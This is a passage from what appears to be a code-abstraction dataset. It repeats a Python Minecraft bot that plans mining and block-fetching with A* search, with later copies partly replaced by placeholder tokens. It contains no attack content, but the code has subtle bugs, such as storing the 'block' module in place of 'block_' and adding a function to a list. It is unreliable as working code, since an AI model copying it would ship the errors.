else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in 